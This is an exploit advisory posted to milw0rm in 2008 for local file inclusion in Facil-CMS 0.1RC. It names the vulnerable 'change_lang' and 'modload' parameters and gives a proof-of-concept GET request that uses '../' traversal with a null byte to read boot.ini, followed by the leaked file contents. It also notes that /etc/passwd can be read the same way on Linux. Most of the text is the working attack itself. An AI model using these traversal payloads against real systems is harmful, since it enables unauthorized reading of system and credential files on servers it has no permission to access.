======================================================= Facil-CMS 0.1RC Local File Inclusion Vulnerabilities ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 12 June 2008 SITE : www.citec.us ##################################################### APPLICATION : Facil-CMS VERSION : 0.1RC VENDOR : http://facilcms.org/ DOWNLOAD : http://downloads.sourceforge.net/facil-cms ##################################################### +++ Local File Inclusion Exploit +++ ------------- Description ------------- [+]Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept GET Method and edit in request data. ----------------------------------------------------- LFI Exploits ----------------------------------------------------- [+]http://[Target]/[Path]/index.php?change_lang= [+]http://[Target]/[Path]/modules.php?modload= ------------------------------------------ POC (Use WebScarab to Edit request data) ------------------------------------------ [+] GET http://192.168.23.13/facil/index.php?change_lang=../../../../../../../../boot.ini%00 HTTP/1.1 [+] Accept: */* [+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) [+] Host: 192.168.23.13 [+] Cookie: PHPSESSID=e0751800f8e3dca481f3a7369d4a6232 This exploit will open boot.ini in system file: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) \WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect You can change boot.ini to /etc/passwd%00 in linux OS. ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-12]